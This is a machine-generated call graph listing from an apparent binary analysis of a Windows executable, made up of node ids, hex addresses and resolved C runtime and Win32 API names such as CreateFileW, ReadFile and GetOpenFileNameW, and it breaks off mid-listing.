27891->27894 27893 402043 27892->27893 27892->27894 27895 4114ab __wcsicoll 58 API calls 27893->27895 27896 401a10 52 API calls 27894->27896 27899 40204e 27895->27899 27897 428b6c 27896->27897 28106 40e0a0 27897->28106 27902 428b90 _wcscpy 27899->27902 27904 401a10 52 API calls 27899->27904 27915 402092 27899->27915 27901 4020a3 27903 428bc6 27901->27903 28102 40e830 53 API calls 27901->28102 27909 401a10 52 API calls 27902->27909 27907 402073 _wcscpy 27904->27907 27905 401a10 52 API calls 27908 428b88 27905->27908 27913 401a10 52 API calls 27907->27913 27908->27902 27918 4020d0 27909->27918 27910 4020bb 28103 40cf00 53 API calls 27910->28103 27912 4020c6 27914 408f40 VariantClear 27912->27914 27913->27915 27914->27918 27915->27901 27915->27902 27916 402110 27920 408f40 VariantClear 27916->27920 27918->27916 27921 401a10 52 API calls 27918->27921 28104 40cf00 53 API calls 27918->28104 28105 40e6a0 53 API calls 27918->28105 27922 402120 moneypunct 27920->27922 27921->27918 27922->27755 27924 4295c9 _memset 27923->27924 27925 40f53c 27923->27925 27927 4295d9 GetOpenFileNameW 27924->27927 28949 410120 27925->28949 27927->27925 27929 40d5f5 27927->27929 27928 40f545 28953 4102b0 SHGetMalloc 27928->28953 27929->27763 27929->27765 27931 40f54c 28958 410190 GetFullPathNameW 27931->28958 27933 40f559 28969 40f570 27933->28969 29023 402400 27935->29023 27937 40146f 27940 428c29 _wcscat 27937->27940 29032 401500 27937->29032 27939 40147c 27939->27940 29040 40d440 27939->29040 27942 401489 27942->27940 27943 401491 GetFullPathNameW 27942->27943 27944 402160 52 API calls 27943->27944 27945 4014bb 27944->27945 27946 402160 52 API calls 27945->27946 27947 4014c8 27946->27947 27947->27940 27948 402160 52 API calls 27947->27948 27949 4014ee 27948->27949 27949->27765 27951 428361 27950->27951 27952 4103fc LoadImageW RegisterClassExW 27950->27952 29090 44395e EnumResourceNamesW LoadImageW 27951->29090 29089 410490 7 API calls 27952->29089 27955 40d651 27957 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 27955->27957 27956 428368 27957->27777 27959 42d7ad 27958->27959 27961 409202 27958->27961 29180 45e737 90 API calls 3 library calls 27959->29180 28016 409216 moneypunct 27961->28016 29179 410940 294 API calls 27961->29179 27963 409386 27964 40939c 27963->27964 27965 40f190 10 API calls 27963->27965 27964->27778 28023 401000 Shell_NotifyIconW _memset 27964->28023 27966 4095b2 27965->27966 27966->27964 27968 401a50 272 API calls 27966->27968 27967 409253 PeekMessageW 27967->28016 27970 4095c6 LockWindowUpdate DestroyWindow GetMessageW 27968->27970 27969 42d8cd Sleep 27969->28016 27970->27964 27973 4095f9 27970->27973 27972 42e13b 29194 40d410 VariantClear 27972->29194 27976 42e158 TranslateMessage DispatchMessageW GetMessageW 27973->27976 27976->27964 27976->27976 27978 409567 PeekMessageW 27978->28016 27980 46f3c1 97 API calls 27980->28016 27981 40e0a0 52 API calls 27981->28016 27982 46fdbf 98 API calls 28021 4094e0 27982->28021 27984 42dcd2 WaitForSingleObject 27987 42dcf0 GetExitCodeProcess CloseHandle 27984->27987 27984->28016 27985 409551 TranslateMessage DispatchMessageW 27985->27978 27986 42dd3d Sleep 27986->28021 29187 40d410 VariantClear 27987->29187 27989 44c29d 52 API calls 27989->28021 27991 4094cf Sleep 27991->28021 27993 40d410 VariantClear 27993->28016 27995 42d94d timeGetTime 29183 465124 53 API calls 27995->29183 27997 40c620 timeGetTime 27997->28021 28000 42dd89 CloseHandle 28000->28021 28001 47d33e 272 API calls 28001->28016 28002 408f40 VariantClear 28002->28021 28004 465124 53 API calls 28004->28021 28005 42de19 GetExitCodeProcess CloseHandle 28005->28021 28006 403cd0 VariantClear 28009 42de88 Sleep 28006->28009 28007 401b10 52 API calls 28007->28021 28009->28016 28012 401980 53 API calls 28012->28021 28014 408cc0 141 API calls 28014->28016 28015 45e737 90 API calls 28015->28016 28016->27963 28016->27967 28016->27969 28016->27972 28016->27978 28016->27980 28016->27981 28016->27984 28016->27985 28016->27986 28016->27991 28016->27993 28016->27995 28016->28001 28016->28014 28016->28015 28017 42e0cc VariantClear 28016->28017 28018 408f40 VariantClear 28016->28018 28016->28021 29091 4091b0 28016->29091 29149 40afa0 28016->29149 29175 4096a0 294 API calls 4 library calls 28016->29175 29176 408fc0 200 API calls moneypunct 28016->29176 29177 40d150 TranslateAcceleratorW 28016->29177 29178 40d170 IsDialogMessageW GetClassLongW 28016->29178 29181 465124 53 API calls 28016->29181 29182 40c620 timeGetTime 28016->29182 29193 40e270 VariantClear moneypunct 28016->29193 28017->28016 28018->28016 28021->27982 28021->27989 28021->27997 28021->28000 28021->28002 28021->28004 28021->28005 28021->28006 28021->28007 28021->28009 28021->28012 28021->28016 29184 45178a 54 API calls 28021->29184 29185 47d33e 294 API calls 28021->29185 29186 453bc6 54 API calls 28021->29186 29188 40d410 VariantClear 28021->29188 29189 443d19 67 API calls _wcslen 28021->29189 29190 4574b4 VariantClear 28021->29190 29191 4731e1 VariantClear 28021->29191 29192 4331a2 6 API calls 28021->29192 28022->27780 28023->27778 28024->27765 28025->27771 28026->27787 28027->27790 28029 40bc70 52 API calls 28028->28029 28030 401f31 28029->28030 28031 402560 28030->28031 28032 40256d __write_nolock 28031->28032 28110 402160 28032->28110 28035 402593 28045 4025bd 28035->28045 28123 401c90 28035->28123 28037 4026a7 28038 401b10 52 API calls 28037->28038 28044 4026db 28037->28044 28040 4026d1 28038->28040 28039 401b10 52 API calls 28039->28045 28134 40d7c0 52 API calls 2 library calls 28040->28134 28042 401c90 52 API calls 28042->28045 28044->27857 28045->28037 28045->28039 28045->28042 28126 4026f0 28045->28126 28133 40d7c0 52 API calls 2 library calls 28045->28133 28143 40f760 28046->28143 28049 410118 28049->27859 28051 42805d 28052 42806a 28051->28052 28199 431e58 28051->28199 28054 413748 _free 46 API calls 28052->28054 28055 428078 28054->28055 28056 431e58 82 API calls 28055->28056 28057 428084 28056->28057 28057->27859 28059 4115d7 52 API calls 28058->28059 28060 401f74 28059->28060 28060->27862 28062 4019a3 28061->28062 28066 401985 28061->28066 28063 4019b8 28062->28063 28062->28066 28064 403e10 53 API calls 28063->28064 28068 4019c4 28064->28068 28065 40199f 28065->27865 28066->28065 28067 403e10 53 API calls 28066->28067 28067->28065 28068->27865 28070 40c2c7 28069->28070 28071 40c30e 28069->28071 28072 40c2d3 28070->28072 28073 426c79 28070->28073 28074 40c315 28071->28074 28075 426c2b 28071->28075 28938 403ea0 52 API calls __cinit 28072->28938 28943 4534e3 52 API calls 28073->28943 28079 40c321 28074->28079 28084 426c5a 28074->28084 28077 426c4b 28075->28077 28078 426c2e 28075->28078 28941 4534e3 52 API calls 28077->28941 28085 40c2de 28078->28085 28940 4534e3 52 API calls 28078->28940 28939 403ea0 52 API calls __cinit 28079->28939 28942 4534e3 52 API calls 28084->28942 28085->27875 28088 401a30 28087->28088 28089 401a17 28087->28089 28090 402160 52 API calls 28088->28090 28091 401a2d 28089->28091 28944 403c30 52 API calls _memmove 28089->28944 28092 401a3d 28090->28092 28091->27879 28092->27879 28095 411523 28094->28095 28096 4114ba 28094->28096 28947 4113a8 58 API calls 3 library calls 28095->28947 28101 40200c 28096->28101 28945 417f77 46 API calls __getptd_noexit 28096->28945 28099 4114c6 28946 417f25 10 API calls __mbschr_l 28099->28946 28101->27882 28101->27883 28102->27910 28103->27912 28104->27918 28105->27918 28107 40e0b2 28106->28107 28108 40e0a8 28106->28108 28107->27905 28948 403c30 52 API calls _memmove 28108->28948 28111 426daa 28110->28111 28112 40216b _wcslen 28110->28112 28137 40c600 28111->28137 28115 402180 28112->28115 28116 40219e 28112->28116 28114 426db5 28114->28035 28135 403bd0 52 API calls moneypunct 28115->28135 28136 4013a0 52 API calls 28116->28136 28119 402187 _memmove 28119->28035 28120 4021a5 28121 426db7 28120->28121 28122 4115d7 52 API calls 28120->28122 28122->28119 28124 4026f0 52 API calls 28123->28124 28125 401c97 28124->28125 28125->28035 28127 426873 28126->28127 28128 4026ff 28126->28128 28142 4013a0 52 API calls 28127->28142 28128->28045 28130 42687b 28131 4115d7 52 API calls 28130->28131 28132 42689e _memmove 28131->28132 28132->28045 28133->28045 28134->28044 28135->28119 28136->28120 28138 40c619 28137->28138 28139 40c60a 28137->28139 28138->28114 28139->28138 28140 4026f0 52 API calls 28139->28140 28141 426d7a _memmove 28140->28141 28141->28114 28142->28130 28203 40f6f0 28143->28203 28145 40f77b moneypunct 28211 40f850 28145->28211 28150 427c2a 28241 414d04 28150->28241 28152 40f7fc 28152->28150 28153 40f804 28152->28153 28228 414a46 28153->28228 28158 40f80e 28158->28049 28162 4528bd 28158->28162 28159 427c59 28247 414fe2 28159->28247 28161 427c79 28163 4150d1 _fseek 81 API calls 28162->28163 28164 452930 28163->28164 28880 452719 28164->28880 28167 452948 28167->28051 28168 414d04 __fread_nolock 61 API calls 28169 452966 28168->28169 28170 414d04 __fread_nolock 61 API calls 28169->28170 28171 452976 28170->28171 28172 414d04 __fread_nolock 61 API calls 28171->28172 28173 45298f 28172->28173 28174 414d04 __fread_nolock 61 API calls 28173->28174 28175 4529aa 28174->28175 28176 4150d1 _fseek 81 API calls 28175->28176 28177 4529c4 28176->28177 28178 4135bb _malloc 46 API calls 28177->28178 28179 4529cf 28178->28179 28180 4135bb _malloc 46 API calls 28179->28180 28181 4529db 28180->28181 28182 414d04 __fread_nolock 61 API calls 28181->28182 28183 4529ec 28182->28183 28184 44afef GetSystemTimeAsFileTime 28183->28184 28185 452a00 28184->28185 28186 452a36 28185->28186 28187 452a13 28185->28187 28189 452aa5 28186->28189 28190 452a3c 28186->28190 28188 413748 _free 46 API calls 28187->28188 28192 452a1c 28188->28192 28191 413748 _free 46 API calls 28189->28191 28886 44b1a9 28190->28886 28195 452aa3 28191->28195 28196 413748 _free 46 API calls 28192->28196 28194 452a9d 28197 413748 _free 46 API calls 28194->28197 28195->28051 28198 452a25 28196->28198 28197->28195 28198->28051 28200 431e64 28199->28200 28201 431e6a 28199->28201 28202 414a46 82 API calls 28200->28202 28201->28052 28202->28201 28204 425de2 28203->28204 28205 40f6fc _wcslen 28203->28205 28204->28145 28206 40f710 WideCharToMultiByte 28205->28206 28207 40f756 28206->28207 28208 40f728 28206->28208 28207->28145 28209 4115d7 52 API calls 28208->28209 28210 40f735 WideCharToMultiByte 28209->28210 28210->28145 28213 40f85d _memset _strlen 28211->28213 28212 426b3b 28213->28212 28215 40f7ab 28213->28215 28260 414db8 28213->28260 28216 4149c2 28215->28216 28275 414904 28216->28275 28218 40f7e9 28218->28150 28219 40f5c0 28218->28219 28223 40f5cd __write_nolock _memmove 28219->28223 28220 414d04 __fread_nolock 61 API calls 28220->28223 28221 40f691 __tzset_nolock 28221->28152 28223->28220 28223->28221 28227 425d11 28223->28227 28473 4150d1 28223->28473 28224 4150d1 _fseek 81 API calls 28225 425d33 28224->28225 28226 414d04 __fread_nolock 61 API calls 28225->28226 28226->28221 28227->28224 28229 414a52 _raise 28228->28229 28230 414a64 28229->28230 28231 414a79 28229->28231 28629 417f77 46 API calls __getptd_noexit 28230->28629 28233 415471 __lock_file 47 API calls 28231->28233 28238 414a74 _raise 28231->28238 28235 414a92 28233->28235 28234 414a69 28630 417f25 10 API calls __mbschr_l 28234->28630 28613 4149d9 28235->28613 28238->28158 28685 414c76 28241->28685 28243 414d1c 28244 44afef 28243->28244 28873 442c5a 28244->28873 28246 44b00d 28246->28159 28248 414fee _raise 28247->28248 28249 414ffa 28248->28249 28250 41500f 28248->28250 28877 417f77 46 API calls __getptd_noexit 28249->28877 28252 415471 __lock_file 47 API calls 28250->28252 28254 415017 28252->28254 28253 414fff 28878 417f25 10 API calls __mbschr_l 28253->28878 28256 414e4e __ftell_nolock 51 API calls 28254->28256 28257 415024 28256->28257 28879 41503d LeaveCriticalSection LeaveCriticalSection _fseek 28257->28879 28259 41500a _raise 28259->28161 28261 414dd6 28260->28261 28262 414deb 28260->28262 28271 417f77 46 API calls __getptd_noexit 28261->28271 28262->28261 28264 414df2 28262->28264 28273 41b91b 79 API calls 11 library calls 28264->28273 28265 414ddb 28272 417f25 10 API calls __mbschr_l 28265->28272 28268 414e18 28270 414de6 28268->28270 28274 418f98 77 API calls 7 library calls 28268->28274 28270->28213 28271->28265 28272->28270 28273->28268 28274->28270 28278 414910 _raise 28275->28278 28276 414923 28331 417f77 46 API calls __getptd_noexit 28276->28331 28278->28276 28280 414951 28278->28280 28279 414928 28332 417f25 10 API calls __mbschr_l 28279->28332 28294 41d4d1 28280->28294 28283 414956 28284 41496a 28283->28284 28285 41495d 28283->28285 28287 414992 28284->28287 28288 414972 28284->28288 28333 417f77 46 API calls __getptd_noexit 28285->28333 28311 41d218 28287->28311 28334 417f77 46 API calls __getptd_noexit 28288->28334 28291 414933 _raise @_EH4_CallFilterFunc@8 28291->28218 28295 41d4dd _raise 28294->28295 28296 4182cb __lock 46 API calls 28295->28296 28297 41d4eb 28296->28297 28298 41d567 28297->28298 28306 418209 __mtinitlocknum 46 API calls 28297->28306 28309 41d560 28297->28309 28339 4154b2 47 API calls __lock 28297->28339 28340 415520 LeaveCriticalSection LeaveCriticalSection _doexit 28297->28340 28300 416b04 __malloc_crt 46 API calls 28298->28300 28301 41d56e 28300->28301 28303 41d57c InitializeCriticalSectionAndSpinCount 28301->28303 28301->28309 28302 41d5f0 _raise 28302->28283 28304 41d59c 28303->28304 28305 41d5af EnterCriticalSection 28303->28305 28308 413748 _free 46 API calls 28304->28308 28305->28309 28306->28297 28308->28309 28336 41d5fb 28309->28336 28312 41d23a 28311->28312 28313 41d255 28312->28313 28325 41d26c __wopenfile 28312->28325 28345 417f77 46 API calls __getptd_noexit 28313->28345 28314 41d421 28317 41d47a 28314->28317 28318 41d48c 28314->28318 28316 41d25a 28346 417f25 10 API calls __mbschr_l 28316->28346 28350 417f77 46 API calls __getptd_noexit 28317->28350 28342 422bf9 28318->28342 28322 41d47f 28351 417f25 10 API calls __mbschr_l 28322->28351 28323 41499d 28335 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 28323->28335 28325->28314 28325->28317 28347 41341f 58 API calls 2 library calls 28325->28347 28327 41d41a 28327->28314 28348 41341f 58 API calls 2 library calls 28327->28348 28329 41d439 28329->28314 28349 41341f 58 API calls 2 library calls 28329->28349 28331->28279 28332->28291 28333->28291 28334->28291 28335->28291 28341 4181f2 LeaveCriticalSection 28336->28341 28338 41d602 28338->28302 28339->28297 28340->28297 28341->28338 28352 422b35 28342->28352 28344 422c14 28344->28323 28345->28316 28346->28323 28347->28327 28348->28329 28349->28314 28350->28322 28351->28323 28355 422b41 _raise 28352->28355 28353 422b54 28470 417f77 46 API calls __getptd_noexit 28353->28470 28355->28353 28356 422b8a 28355->28356 28363 422400 28356->28363 28357 422b59 28471 417f25 10 API calls __mbschr_l 28357->28471 28360 422ba4 28472 422bcb LeaveCriticalSection __unlock_fhandle 28360->28472 28362 422b63 _raise 28362->28344 28364 422427 28363->28364 28365 414021 __tsopen_nolock 46 API calls 28364->28365 28367 422443 28365->28367 28366 417ed3 __invoke_watson 10 API calls 28374 422b34 _raise 28366->28374 28368 422482 28367->28368 28375 4224dd 28367->28375 28416 4226b2 28367->28416 28369 417f8a __commit 46 API calls 28368->28369 28371 422487 28369->28371 28370 422b54 28372 417f77 __mbschr_l 46 API calls 28370->28372 28373 417f77 __mbschr_l 46 API calls 28371->28373 28377 422b59 28372->28377 28378 422491 28373->28378 28374->28370 28376 422b8a 28374->28376 28380 422564 28375->28380 28389 422537 28375->28389 28379 422400 __tsopen_nolock 100 API calls 28376->28379 28381 417f25 __mbschr_l 10 API calls 28377->28381 28382 417f25 __mbschr_l 10 API calls 28378->28382 28383 422ba4 28379->28383 28384 417f8a __commit 46 API calls 28380->28384 28388 422b63 _raise 28381->28388 28394 42249b 28382->28394 28385 422bcb __wsopen_helper LeaveCriticalSection 28383->28385 28386 422569 28384->28386 28385->28388 28387 417f77 __mbschr_l 46 API calls 28386->28387 28390 422573 28387->28390 28388->28360 28391 41af1c __alloc_osfhnd 51 API calls 28389->28391 28392 417f25 __mbschr_l 10 API calls 28390->28392 28393 4225f5 28391->28393 28392->28394 28395 4225fe 28393->28395 28396 42261f CreateFileW 28393->28396 28394->28360 28397 417f8a __commit 46 API calls 28395->28397 28398 4226bc GetFileType 28396->28398 28399 42264c 28396->28399 28400 422603 28397->28400 28401 4226c9 GetLastError 28398->28401 28402 42270d 28398->28402 28403 422685 GetLastError 28399->28403 28406 422660 CreateFileW 28399->28406 28404 417f77 __mbschr_l 46 API calls 28400->28404 28405 417f9d __dosmaperr 46 API calls 28401->28405 28413 41ace6 __set_osfhnd 47 API calls 28402->28413 28407 417f9d __dosmaperr 46 API calls 28403->28407 28408 42260d 28404->28408 28409 4226f2 CloseHandle 28405->28409 28406->28398 28406->28403 28410 4226ac 28407->28410 28411 417f77 __mbschr_l 46 API calls 28408->28411 28409->28410 28412 422700 28409->28412 28414 417f77 __mbschr_l 46 API calls 28410->28414 28411->28394 28415 417f77 __mbschr_l 46 API calls 28412->28415 28419 42272b 28413->28419 28414->28416 28417 422705 28415->28417 28416->28366 28417->28410 28418 422942 28418->28416 28421 422aaa CloseHandle CreateFileW 28418->28421 28419->28418 28420 41e17f __lseek_nolock 48 API calls 28419->28420 28423 422799 28419->28423 28422 42278b 28420->28422 28424 422ad7 GetLastError 28421->28424 28425 422b05 28421->28425 28426 422794 28422->28426 28427 4227ad 28422->28427 28423->28418 28432 42294b 28423->28432 28435 4227a1 28423->28435 28444 42289b 28423->28444 28428 417f9d __dosmaperr 46 API calls 28424->28428 28425->28416 28429 417f8a __commit 46 API calls 28426->28429 28430 41da15 __read_nolock 56 API calls 28427->28430 28431 422ae3 28428->28431 28429->28423 28433 4227be 28430->28433 28434 41ad67 __free_osfhnd 47 API calls 28431->28434 28432->28418 28443 422968 28432->28443 28448 4228bf 28432->28448 28437 4227df 28433->28437 28438 4227cc 28433->28438 28434->28425 28441 41d762 __close_nolock 49 API calls 28435->28441 28436 422913 28440 41da15 __read_nolock 56 API calls 28436->28440 28439 41e17f __lseek_nolock 48 API calls 28437->28439 28442 4238da __chsize_nolock 80 API calls 28438->28442 28439->28423 28456 422920 28440->28456 28441->28410 28445 4227d8 28442->28445 28446 420494 __lseeki64_nolock 48 API calls 28443->28446 28444->28418 28444->28436 28444->28448 28449 4228ea 28444->28449 28445->28435 28445->28437 28447 422973 28446->28447 28447->28448 28451 42297e 28447->28451 28448->28418 28448->28435 28452 41b7b2 __write 77 API calls 28448->28452 28450 420494 __lseeki64_nolock 48 API calls 28449->28450 28458 4228f5 28450->28458 28459 420494 __lseeki64_nolock 48 API calls 28451->28459 28452->28448 28453 4229c3 28455 4229e5 28453->28455 28457 4229ca 28453->28457 28454 4229a9 28461 41d762 __close_nolock 49 API calls 28454->28461 28460 41e17f __lseek_nolock 48 API calls 28455->28460 28456->28418 28456->28435 28456->28453 28456->28454 28456->28455 28462 41e17f __lseek_nolock 48 API calls 28457->28462 28458->28448 28463 4228fc 28458->28463 28464 422988 28459->28464 28466 42298d 28460->28466 28465 4229b0 28461->28465 28462->28466 28467 420494 __lseeki64_nolock 48 API calls 28463->28467 28464->28466 28468 417f77 __mbschr_l 46 API calls 28465->28468 28466->28418 28466->28435 28469 422906 28467->28469 28468->28416 28469->28435 28469->28436 28470->28357 28471->28362 28472->28362 28474 4150dd _raise 28473->28474 28475 4150e9 28474->28475 28476 41510f 28474->28476 28504 417f77 46 API calls __getptd_noexit 28475->28504 28486 415471 28476->28486 28479 4150ee 28505 417f25 10 API calls __mbschr_l 28479->28505 28485 4150f9 _raise 28485->28223 28487 415483 28486->28487 28488 4154a5 EnterCriticalSection 28486->28488 28487->28488 28489 41548b 28487->28489 28490 415117 28488->28490 28491 4182cb __lock 46 API calls 28489->28491 28492 415047 28490->28492 28491->28490 28493 415067 28492->28493 28494 415057 28492->28494 28496 415079 28493->28496 28507 414e4e 28493->28507 28562 417f77 46 API calls __getptd_noexit 28494->28562 28524 41443c 28496->28524 28501 4150b9 28537 41e1f4 28501->28537 28503 41505c 28506 415143 LeaveCriticalSection LeaveCriticalSection _fseek 28503->28506 28504->28479 28505->28485 28506->28485 28508 414e61 28507->28508 28509 414e79 28507->28509 28563 417f77 46 API calls __getptd_noexit 28508->28563 28511 414139 __fclose_nolock 46 API calls 28509->28511 28513 414e80 28511->28513 28512 414e66 28564 417f25 10 API calls __mbschr_l 28512->28564 28515 41e1f4 __write 51 API calls 28513->28515 28517 414e97 28515->28517 28516 414e71 28516->28496 28517->28516 28518 414f09 28517->28518 28520 414ec9 28517->28520 28565 417f77 46 API calls __getptd_noexit 28518->28565 28520->28516 28521 41e1f4 __write 51 API calls 28520->28521 28522 414f64 28521->28522 28522->28516 28523 41e1f4 __write 51 API calls 28522->28523 28523->28516 28525 414455 28524->28525 28529 414477 28524->28529 28526 414139 __fclose_nolock 46 API calls 28525->28526 28525->28529 28527 414470 28526->28527 28566 41b7b2 77 API calls 6 library calls 28527->28566 28530 414139 28529->28530 28531 414145 28530->28531 28532 41415a 28530->28532 28567 417f77 46 API calls __getptd_noexit 28531->28567 28532->28501 28534 41414a 28568 417f25 10 API calls __mbschr_l 28534->28568 28536 414155 28536->28501 28538 41e200 _raise 28537->28538 28539 41e223 28538->28539 28540 41e208 28538->28540 28542 41e22f 28539->28542 28545 41e269 28539->28545 28589 417f8a 46 API calls __getptd_noexit 28540->28589 28591 417f8a 46 API calls __getptd_noexit 28542->28591 28543 41e20d 28590 417f77 46 API calls __getptd_noexit 28543->28590 28569 41ae56 28545->28569 28547 41e234 28592 417f77 46 API calls __getptd_noexit 28547->28592 28550 41e26f 28552 41e291 28550->28552 28553 41e27d 28550->28553 28551 41e23c 28593 417f25 10 API calls __mbschr_l 28551->28593 28594 417f77 46 API calls __getptd_noexit 28552->28594 28579 41e17f 28553->28579 28555 41e215 _raise 28555->28503 28558 41e289 28596 41e2c0 LeaveCriticalSection __unlock_fhandle 28558->28596 28559 41e296 28595 417f8a 46 API calls __getptd_noexit 28559->28595 28562->28503 28563->28512 28564->28516 28565->28516 28566->28529 28567->28534 28568->28536 28570 41ae62 _raise 28569->28570 28571 41aebc 28570->28571 28572 4182cb __lock 46 API calls 28570->28572 28573 41aec1 EnterCriticalSection 28571->28573 28575 41aede _raise 28571->28575 28574 41ae8e 28572->28574 28573->28575 28576 41aeaa 28574->28576 28577 41ae97 InitializeCriticalSectionAndSpinCount 28574->28577 28575->28550 28597 41aeec LeaveCriticalSection _doexit 28576->28597 28577->28576 28598 41aded 28579->28598 28581 41e18e 28582 41e1a4 SetFilePointer 28581->28582 28583 41e194 28581->28583 28584 41e1c3 28582->28584 28585 41e1bb GetLastError 28582->28585 28611 417f77 46 API calls __getptd_noexit 28583->28611 28588 41e199 28584->28588 28612 417f9d 46 API calls 3 library calls 28584->28612 28585->28584 28588->28558 28589->28543 28590->28555 28591->28547 28592->28551 28593->28555 28594->28559 28595->28558 28596->28555 28597->28571 28599 41ae12 28598->28599 28600 41adfa 28598->28600 28603 417f8a __commit 46 API calls 28599->28603 28604 41ae51 28599->28604 28601 417f8a __commit 46 API calls 28600->28601 28602 41adff 28601->28602 28605 417f77 __mbschr_l 46 API calls 28602->28605 28606 41ae23 28603->28606 28604->28581 28607 41ae07 28605->28607 28608 417f77 __mbschr_l 46 API calls 28606->28608 28607->28581 28609 41ae2b 28608->28609 28610 417f25 __mbschr_l 10 API calls 28609->28610 28610->28607 28611->28588 28612->28588 28614 4149ea 28613->28614 28615 4149fe 28613->28615 28659 417f77 46 API calls __getptd_noexit 28614->28659 28617 4149fa 28615->28617 28619 41443c __flush 77 API calls 28615->28619 28631 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 28617->28631 28618 4149ef 28660 417f25 10 API calls __mbschr_l 28618->28660 28621 414a0a 28619->28621 28632 41d8c2 28621->28632 28624 414139 __fclose_nolock 46 API calls 28625 414a18 28624->28625 28636 41d7fe 28625->28636 28627 414a1e 28627->28617 28628 413748 _free 46 API calls 28627->28628 28628->28617 28629->28234 28630->28238 28631->28238 28633 414a12 28632->28633 28634 41d8d2 28632->28634 28633->28624 28634->28633 28635 413748 _free 46 API calls 28634->28635 28635->28633 28637 41d80a _raise 28636->28637 28638 41d812 28637->28638 28639 41d82d 28637->28639 28676 417f8a 46 API calls __getptd_noexit 28638->28676 28641 41d839 28639->28641 28644 41d873 28639->28644 28678 417f8a 46 API calls __getptd_noexit 28641->28678 28642 41d817 28677 417f77 46 API calls __getptd_noexit 28642->28677 28648 41ae56 ___lock_fhandle 48 API calls 28644->28648 28646 41d83e 28679 417f77 46 API calls __getptd_noexit 28646->28679 28650 41d879 28648->28650 28649 41d846 28680 417f25 10 API calls __mbschr_l 28649->28680 28652 41d893 28650->28652 28653 41d887 28650->28653 28681 417f77 46 API calls __getptd_noexit 28652->28681 28661 41d762 28653->28661 28654 41d81f _raise 28654->28627 28657 41d88d 28682 41d8ba LeaveCriticalSection __unlock_fhandle 28657->28682 28659->28618 28660->28617 28662 41aded __commit 46 API calls 28661->28662 28665 41d772 28662->28665 28663 41d7c8 28683 41ad67 47 API calls 2 library calls 28663->28683 28665->28663 28666 41aded __commit 46 API calls 28665->28666 28675 41d7a6 28665->28675 28670 41d79d 28666->28670 28667 41aded __commit 46 API calls 28671 41d7b2 FindCloseChangeNotification 28667->28671 28668 41d7f2 28668->28657 28669 41d7d0 28669->28668 28684 417f9d 46 API calls 3 library calls 28669->28684 28673 41aded __commit 46 API calls 28670->28673 28671->28663 28674 41d7be GetLastError 28671->28674 28673->28675 28674->28663 28675->28663 28675->28667 28676->28642 28677->28654 28678->28646 28679->28649 28680->28654 28681->28657 28682->28654 28683->28669 28684->28668 28686 414c82 _raise 28685->28686 28687 414cc3 28686->28687 28688 414c96 _memset 28686->28688 28689 414cbb _raise 28686->28689 28690 415471 __lock_file 47 API calls 28687->28690 28712 417f77 46 API calls __getptd_noexit 28688->28712 28689->28243 28692 414ccb 28690->28692 28698 414aba 28692->28698 28693 414cb0 28713 417f25 10 API calls __mbschr_l 28693->28713 28702 414ad8 _memset 28698->28702 28705 414af2 28698->28705 28699 414ae2 28765 417f77 46 API calls __getptd_noexit 28699->28765 28701 414ae7 28766 417f25 10 API calls __mbschr_l 28701->28766 28702->28699 28702->28705 28709 414b2d 28702->28709 28714 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 28705->28714 28706 414c38 _memset 28768 417f77 46 API calls __getptd_noexit 28706->28768 28707 414139 __fclose_nolock 46 API calls 28707->28709 28709->28705 28709->28706 28709->28707 28715 41dfcc 28709->28715 28745 41d8f3 28709->28745 28767 41e0c2 46 API calls 3 library calls 28709->28767 28712->28693 28713->28689 28714->28689 28716 41dfd8 _raise 28715->28716 28717 41dfe0 28716->28717 28718 41dffb 28716->28718 28838 417f8a 46 API calls __getptd_noexit 28717->28838 28720 41e007 28718->28720 28724 41e041 28718->28724 28840 417f8a 46 API calls __getptd_noexit 28720->28840 28721 41dfe5 28839 417f77 46 API calls __getptd_noexit 28721->28839 28723 41e00c 28841 417f77 46 API calls __getptd_noexit 28723->28841 28727 41e063 28724->28727 28728 41e04e 28724->28728 28730 41ae56 ___lock_fhandle 48 API calls 28727->28730 28843 417f8a 46 API calls __getptd_noexit 28728->28843 28732 41e069 28730->28732 28731 41e053 28844 417f77 46 API calls __getptd_noexit 28731->28844 28733 41e077 28732->28733 28734 41e08b 28732->28734 28769 41da15 28733->28769 28845 417f77 46 API calls __getptd_noexit 28734->28845 28739 41dfed _raise 28739->28709 28740 41e014 28842 417f25 10 API calls __mbschr_l 28740->28842 28741 41e083 28847 41e0ba LeaveCriticalSection __unlock_fhandle 28741->28847 28742 41e090 28846 417f8a 46 API calls __getptd_noexit 28742->28846 28746 41d900 28745->28746 28751 41d915 28745->28751 28871 417f77 46 API calls __getptd_noexit 28746->28871 28748 41d910 28748->28709 28749 41d905 28872 417f25 10 API calls __mbschr_l 28749->28872 28751->28748 28752 41d94a 28751->28752 28868 420603 28751->28868 28754 414139 __fclose_nolock 46 API calls 28752->28754 28755 41d95e 28754->28755 28756 41dfcc __read 59 API calls 28755->28756 28757 41d965 28756->28757 28757->28748 28758 414139 __fclose_nolock 46 API calls 28757->28758 28759 41d988 28758->28759 28759->28748 28760 414139 __fclose_nolock 46 API calls 28759->28760 28761 41d994 28760->28761 28761->28748 28762 414139 __fclose_nolock 46 API calls 28761->28762 28763 41d9a1 28762->28763 28764 414139 __fclose_nolock 46 API calls 28763->28764 28764->28748 28765->28701 28766->28705 28767->28709 28768->28701 28770 41da31 28769->28770 28771 41da4c 28769->28771 28848 417f8a 46 API calls __getptd_noexit 28770->28848 28773 41da5b 28771->28773 28775 41da7a 28771->28775 28850 417f8a 46 API calls __getptd_noexit 28773->28850 28774 41da36 28849 417f77 46 API calls __getptd_noexit 28774->28849 28777 41da98 28775->28777 28792 41daac 28775->28792 28853 417f8a 46 API calls __getptd_noexit 28777->28853 28779 41da60 28851 417f77 46 API calls __getptd_noexit 28779->28851 28781 41db02 28855 417f8a 46 API calls __getptd_noexit 28781->28855 28784 41da9d 28854 417f77 46 API calls __getptd_noexit 28784->28854 28785 41da67 28852 417f25 10 API calls __mbschr_l 28785->28852 28787 41db07 28856 417f77 46 API calls __getptd_noexit 28787->28856 28789 41da3e 28789->28741 28791 41daa4 28857 417f25 10 API calls __mbschr_l 28791->28857 28792->28781 28792->28789 28793 41dae1 28792->28793 28794 41db1b 28792->28794 28793->28781 28800 41daec ReadFile 28793->28800 28797 416b04 __malloc_crt 46 API calls 28794->28797 28801 41db31 28797->28801 28798 41dc17 28799 41df8f GetLastError 28798->28799 28807 41dc2b 28798->28807 28802 41de16 28799->28802 